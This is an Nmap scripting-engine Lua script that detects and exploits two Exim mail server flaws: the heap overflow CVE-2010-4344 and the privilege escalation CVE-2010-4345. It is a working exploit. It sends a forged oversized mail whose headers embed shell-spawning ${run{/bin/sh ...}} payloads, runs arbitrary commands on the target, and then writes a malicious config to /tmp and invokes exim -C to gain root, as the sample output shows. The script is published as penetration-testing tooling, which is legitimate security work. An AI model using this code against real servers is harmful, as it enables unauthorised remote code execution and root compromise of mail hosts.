description = [[
Checks for and/or exploits a heap overflow within versions of Exim
prior to version 4.69 (CVE-2010-4344) and a privilege escalation
vulnerability in Exim 4.72 and prior (CVE-2010-4345).
The heap overflow vulnerability allows remote attackers to execute
arbitrary code with the privileges of the Exim daemon
(CVE-2010-4344). If the exploit fails then the Exim smtpd child will
be killed (heap corruption).
The script also checks for a privilege escalation vulnerability that
affects Exim version 4.72 and prior. The vulnerability allows the exim
user to gain root privileges by specifying an alternate configuration
file using the -C option (CVE-2010-4345).
The smtp-vuln-cve2010-4344.exploit
script argument will make
the script try to exploit the vulnerabilties, by sending more than 50MB of
data, it depends on the message size limit configuration option of the
Exim server. If the exploit succeed the exploit.cmd
or
smtp-vuln-cve2010-4344.cmd
script arguments can be used to
run an arbitrary command on the remote system, under the
Exim
user privileges. If this script argument is set then it
will enable the smtp-vuln-cve2010-4344.exploit
argument.
To get the appropriate debug messages for this script, please use -d2.
Some of the logic of this script is based on the metasploit
exim4_string_format exploit.
* http://www.metasploit.com/modules/exploit/unix/smtp/exim4_string_format
Reference:
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-4344
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-4345
]]
---
-- @usage
-- nmap --script=smtp-vuln-cve2010-4344 --script-args="smtp-vuln-cve2010-4344.exploit" -pT:25,465,587
-- nmap --script=smtp-vuln-cve2010-4344 --script-args="exploit.cmd='uname -a'" -pT:25,465,587
--
-- @output
-- PORT STATE SERVICE
-- 25/tcp open smtp
-- | smtp-vuln-cve2010-4344:
-- | Exim heap overflow vulnerability (CVE-2010-4344):
-- | Exim (CVE-2010-4344): VULNERABLE
-- | Shell command 'uname -a': Linux qemu-ubuntu-x32 2.6.38-8-generic #42-Ubuntu SMP Fri Jan 21 17:40:48 UTC 2011 i686 GNU/Linux
-- | Exim privileges escalation vulnerability (CVE-2010-4345):
-- | Exim (CVE-2010-4345): VULNERABLE
-- | Before 'id': uid=121(Debian-exim) gid=128(Debian-exim) groups=128(Debian-exim),45(sasl)
-- |_ After 'id': uid=0(root) gid=128(Debian-exim) groups=0(root)
--
-- @args smtp.domain Define the domain to be used in the SMTP EHLO command.
-- @args smtp-vuln-cve2010-4344.exploit The script will force the checks,
-- and will try to exploit the Exim SMTP server.
-- @args smtp-vuln-cve2010-4344.mailfrom Define the source email address to
-- be used.
-- @args smtp-vuln-cve2010-4344.mailto Define the destination email address
-- to be used.
-- @args exploit.cmd or smtp-vuln-cve2010-4344.cmd An arbitrary command to
-- run under the Exim
user privileges on the remote
-- system. If this argument is set then, it will enable the
-- smtp-vuln-cve2010-4344.exploit
argument.
author = "Djalal Harouni"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"exploit", "intrusive", "vuln"}
require "shortport"
require "smtp"
require "stdnse"
portrule = shortport.port_or_service({25, 465, 587},
{"smtp", "smtps", "submission"})
local function smtp_finish(socket, status, msg)
if socket then
smtp.quit(socket)
end
return status, msg
end
local function get_exim_banner(response)
local banner, version
banner = response:match("%d+%s(.+)")
if banner then
version = tonumber(banner:match("Exim%s([0-9\.]+)"))
end
return banner, version
end
local function send_recv(socket, data)
local st, ret = socket:send(data)
if st then
st, ret = socket:receive_lines(1)
end
return st, ret
end
-- Exploit the privileges escalation vulnerability CVE-2010-4345.
-- return true, results (shell command results) If it was
-- successfully exploited.
local function escalate_privs(socket, smtp_opts)
local exploited, results = false, ""
local tmp_file = "/tmp/nmap"..tostring(math.random(0x0FFFFF, 0x7FFFFFFF))
local exim_run = "exim -C"..tmp_file.." -q"
local exim_spool = "spool_directory = \\${run{/bin/sh -c 'id > "..
tmp_file.."' }}"
stdnse.print_debug(2, "%s: trying to escalate privileges",
SCRIPT_NAME)
local status, ret = send_recv(socket, "id\n")
if not status then
return status, ret
end
results = string.format(" Before 'id': %s",
string.gsub(ret, "^%$*%s*(.-)\n*%$*$", "%1"))
status, ret = send_recv(socket,
string.format("cat > %s << EOF\n",
tmp_file))
if not status then
return status, ret
end
status, ret = send_recv(socket, exim_spool.."\nEOF\n")
if not status then
return status, ret
end
status, ret = send_recv(socket, exim_run.."\n")
if not status then
return status, ret
end
status, ret = send_recv(socket, string.format("cat %s\n", tmp_file))
if not status then
return status, ret
elseif ret:match("uid=0%(root%)") then
exploited = true
results = results..string.format("\n After 'id': %s",
string.gsub(ret, "^%$*%s*(.-)\n*%$*$", "%1"))
stdnse.print_debug(2,
"%s: successfully exploited the Exim privileges escalation.",
SCRIPT_NAME)
end
-- delete tmp file, should we care about this ?
socket:send(string.format("rm -fr %s\n", tmp_file))
return exploited, results
end
-- Tries to exploit the heap overflow and the priviled escalation
-- Returns true, exploit_status, possible values:
-- nil Not vulnerable
-- "heap" Vulnerable to the heap overflow
-- "heap-exploited" The heap overflow vulenrability was exploited
local function exploit_heap(socket, smtp_opts)
local exploited, ret = false, ""
stdnse.print_debug(2, "%s: exploiting the heap overflow",
SCRIPT_NAME)
local status, response = smtp.mail(socket, smtp_opts.mailfrom)
if not status then
return status, response
end
status, response = smtp.recipient(socket, smtp_opts.mailto)
if not status then
return status, response
end
-- send DATA command
status, response = smtp.datasend(socket)
if not status then
return status, response
end
local msg_len, log_buf_size = smtp_opts.size + (1024*256), 8192
local log_buf = "YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from"
local log_host = string.format("%s(%s)",
smtp_opts.ehlo_host ~= smtp_opts.domain and
smtp_opts.ehlo_host.." " or "",
smtp_opts.domain)
log_buf = string.format("%s <%s> H=%s [%s]: message too big: "..
"read=%s max=%s\nEnvelope-from: <%s>\nEnvelope-to: <%s>\n",
log_buf, smtp_opts.mailfrom, log_host, smtp_opts.domain_ip,
msg_len, smtp_opts.size, smtp_opts.mailfrom,
smtp_opts.mailto)
log_buf_size = log_buf_size - 3
local filler, hdrs, nmap_hdr = string.rep("X", 8 * 16), "", "NmapHeader"
while #log_buf < log_buf_size do
local hdr = string.format("%s: %s\n", nmap_hdr, filler)
local one = 2 + #hdr
local two = 2 * one
local left = log_buf_size - #log_buf
if left < two and left > one then
left = left - 4
local first = left / 2
hdr = string.sub(hdr, 0, first - 1).."\n"
hdrs = hdrs..hdr
log_buf = log_buf.." "..hdr
local second = left - first
hdr = string.format("%s: %s\n", nmap_hdr, filler)
hdr = string.sub(hdr, 0, second - 1).."\n"
end
hdrs = hdrs..hdr
log_buf = log_buf.." "..hdr
end
local hdrx = "HeaderX: "
for i = 1, 50 do
for fd = 3, 12 do
hdrx = hdrx..
string.format("${run{/bin/sh -c 'exec /bin/sh -i <&%d >&0 2>&0'}} ",
fd)
end
end
local function clean(socket, status, msg)
socket:close()
return status, msg
end
stdnse.print_debug(1, "%s: sending forged mail, size: %dMB",
SCRIPT_NAME, msg_len / (1024*1024))
-- use low socket level functions.
status, ret = socket:send(hdrs)
if not status then
return clean(socket, status, "failed to send hdrs.")
end
status, ret = socket:send(hdrx)
if not status then
return clean(socket, status, "failed to send hdrx.")
end
status, ret = socket:send("\r\n")
if not status then
return clean(socket, status, "failed to terminate headers.")
end
local body_size = 0
filler = string.rep(string.rep("Nmap", 63).."XX\r\n", 1024)
while body_size < msg_len do
body_size = body_size + #filler
status, ret = socket:send(filler)
if not status then
return clean(socket, status, "failed to send body.")
end
end
status, response = smtp.query(socket, "\r\n.")
if not status then
if string.match(response, "connection closed") then
-- the child was killed (heap corruption).
return true, "heap"
else
return status, "failed to terminate the message."
end
end
status, ret = smtp.check_reply("DATA", response)
if not status then
local code = tonumber(ret:match("(%d+)"))
if code ~= 552 then
smtp.quit(socket)
return status, ret
end
end
stdnse.print_debug(2, "%s: the forged mail was sent successfully.",
SCRIPT_NAME)
-- second round
status, response = smtp.query(socket, "MAIL",
string.format("FROM:<%s>", smtp_opts.mailfrom))
if not status then
return status, response
end
status, ret = smtp.query(socket, "RCPT",
string.format("TO:<%s>", smtp_opts.mailto))
if not status then
return status, ret
end
if response:match("sh:%s") or ret:match("sh:%s") then
stdnse.print_debug(2,
"%s: successfully exploited the Exim heap overflow.", SCRIPT_NAME)
exploited = "heap-exploited"
end
return true, exploited
end
-- Checks if the Exim server is vulnerable to CVE-2010-4344
local function check_exim(smtp_opts)
local out, smtp_server = {}, {}
local exim_heap_ver, exim_priv_ver = 4.69, 4.72
local exim_default_size, nmap_scanme_ip = 52428800, '64.13.134.52'
local heap_cve, priv_cve = 'CVE-2010-4344', 'CVE-2010-4345'
local heap_str = "Exim heap overflow vulnerability ("..heap_cve.."):"
local priv_str = "Exim privileges escalation vulnerability ("..priv_cve.."):"
local exip_heap_result, exip_priv_result = "", ""
local socket, ret = smtp.connect(smtp_opts.host,
smtp_opts.port,
{ssl = true,
timeout = 8000,
recv_before = true,
lines = 1})
if not socket then
return smtp_finish(nil, socket, ret)
end
table.insert(out, heap_str)
table.insert(out, priv_str)
smtp_server.banner, smtp_server.version = get_exim_banner(ret)
if smtp_server.banner then
smtp_server.smtpd = smtp_server.banner:match("Exim")
if smtp_server.smtpd and smtp_server.version then
table.insert(out, 1,
string.format("Exim version: %.02f", smtp_server.version))
if smtp_server.version > exim_heap_ver then
exim_heap_result = string.format(" Exim (%s): NOT VULNERABLE",
heap_cve)
else
exim_heap_result = string.format(" Exim (%s): LIKELY VULNERABLE",
heap_cve)
end
if smtp_server.version > exim_priv_ver then
exim_priv_result = string.format(" Exim (%s): NOT VULNERABLE",
priv_cve)
else
exim_priv_result = string.format(" Exim (%s): LIKELY VULNERABLE",
priv_cve)
end
else
return smtp_finish(socket, true,
'The SMTP server is not Exim: NOT VULNERABLE')
end
else
return smtp_finish(socket, false,
'failed to read the SMTP banner.')
end
if not smtp_opts.exploit then
table.insert(out, 3, exim_heap_result)
table.insert(out, 5, exim_priv_result)
table.insert(out,
"To confirm and exploit the vulnerabilities, run with"..
" --script-args='smtp-vuln-cve2010-4344.exploit'")
return smtp_finish(socket, true, out)
end
-- force the checks and exploit the program
local status, response = smtp.ehlo(socket, smtp_opts.domain)
if not status then
return smtp_finish(nil, status, response)
end
for _, line in pairs(stdnse.strsplit("\r?\n", response)) do
if not smtp_opts.ehlo_host or not smtp_opts.domain_ip then
smtp_opts.ehlo_host, smtp_opts.domain_ip =
line:match("%d+.*Hello%s(.*)%s%[(.*)%]")
end
if not smtp_server.size then
smtp_server.size = line:match("%d+%-SIZE%s(%d+)")
end
end
if not smtp_server.size then
smtp_server.size = exim_default_size
else
smtp_server.size = tonumber(smtp_server.size)
end
smtp_opts.size = smtp_server.size
-- use 'nmap.scanme.org' IP address
if not smtp_opts.domain_ip then
smtp_opts.domain_ip = nmap_scanme_ip
end
-- set the appropriate 'MAIL FROM' and 'RCPT TO' values
if not smtp_opts.mailfrom then
smtp_opts.mailfrom = string.format("root@%s", smtp_opts.domain)
end
if not smtp_opts.mailto then
smtp_opts.mailto = string.format("postmaster@%s",
smtp_opts.host.targetname and
smtp_opts.host.targetname or 'localhost')
end
status, ret = exploit_heap(socket, smtp_opts)
if not status then
return smtp_finish(nil, status, ret)
elseif ret then
exim_heap_result = string.format(" Exim (%s): VULNERABLE",
heap_cve)
exim_priv_result = string.format(" Exim (%s): VULNERABLE",
priv_cve)
if ret:match("exploited") then
-- clear socket
socket:receive_lines(1)
if smtp_opts.shell_cmd then
status, response = send_recv(socket,
string.format("%s\n", smtp_opts.shell_cmd))
if status then
exim_heap_result = exim_heap_result ..
string.format("\n Shell command '%s': %s",
smtp_opts.shell_cmd,
string.gsub(response, "^%$*%s*(.-)\n*%$*$", "%1"))
end
end
status, response = escalate_privs(socket, smtp_opts)
if status then
exim_priv_result = exim_priv_result.."\n"..response
end
socket:close()
end
else
exim_heap_result = string.format(" Exim (%s): NOT VULNERABLE",
heap_cve)
end
table.insert(out, 3, exim_heap_result)
table.insert(out, 5, exim_priv_result)
return true, out
end
action = function(host, port)
local smtp_opts = {
host = host,
port = port,
domain = stdnse.get_script_args('smtp.domain') or
'nmap.scanme.org',
mailfrom = stdnse.get_script_args('smtp-vuln-cve2010-4344.mailfrom'),
mailto = stdnse.get_script_args('smtp-vuln-cve2010-4344.mailto'),
exploit = stdnse.get_script_args('smtp-vuln-cve2010-4344.exploit'),
shell_cmd = stdnse.get_script_args('exploit.cmd') or
stdnse.get_script_args('smtp-vuln-cve2010-4344.cmd'),
}
if smtp_opts.shell_cmd then
smtp_opts.exploit = true
end
local status, output = check_exim(smtp_opts)
if not status then
stdnse.print_debug(1, "%s: %s", SCRIPT_NAME, output)
return nil
end
return stdnse.format_output(status, output)
end